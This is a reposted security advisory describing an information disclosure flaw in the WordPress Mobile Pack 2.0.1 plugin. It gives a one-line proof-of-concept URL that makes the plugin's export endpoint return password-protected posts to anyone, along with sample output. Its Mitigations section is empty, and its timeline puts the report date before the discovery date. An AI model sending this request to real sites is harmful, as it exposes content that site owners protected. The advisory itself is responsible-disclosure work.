Home / vulnerabilitiesPDF  

WordPress Mobile Pack 2.0.1 Information Disclosure

Posted on 21 August 2014
Source : packetstormsecurity.org Link

 

Details
================
Software: WordPress Mobile Pack
Version: 2.0.1
Homepage: http://wordpress.org/plugins/wordpress-mobile-pack/
Advisory report: https://security.dxw.com/advisories/information-disclosure-vulnerability-in-wordpress-mobile-pack-allows-anybody-to-read-password-protected-posts/
CVE: Awaiting assignment
CVSS: 5 (Medium; AV:N/AC:L/Au:N/C:P/I:N/A:N)

Description
================
Information disclosure vulnerability in WordPress Mobile Pack allows anybody to read password protected posts

Vulnerability
================
WordPress Mobile Pack contains a PHP file which allows anybody – authenticated or otherwise – to read all public and password protected posts (draft and private posts appear not to be affected).

Proof of concept
================

Create a password-protected post
Enable WordPress Mobile Pack
Visit http://localhost/wp-content/plugins/wordpress-mobile-pack/export/content.php?content=exportarticles&callback=x
Your password-protected post is now visible to everybody in the form of JSON wrapped in “x()”

Example output:
x (
{
"articles": [
{
"id": 849,
"title": "Secret post",
"timestamp": 1406231170,
"author": "admin",
"date": "Thu, Jul 24, 2014, 19:46",
"link": "http://wp.local/?p=849",
"image": "",
"description": "<p>HUSH THIS IS A SECRET</p>n",
"content": "",
"category_id": 1,
"category_name": "Uncategorized"
}
]
}
)

Mitigations
================

Disclosure policy
================
dxw believes in responsible disclosure. Your attention is drawn to our disclosure policy: https://security.dxw.com/disclosure/

Please contact us on security@dxw.com to acknowledge this report if you received it via a third party (for example, plugins@wordpress.org) as they generally cannot communicate with us on your behalf.

This vulnerability will be published if we do not receive a response to this report with 14 days.

Timeline
================

2014-07-24: Discovered
2014-07-13: Reported to developer via email
2014-08-19: Developer reported the issue fixed
2014-08-20: Advisory published

Discovered by dxw:
================
Tom Adams
Please visit security.dxw.com for more information.

 

TOP

Malware :

Exploits :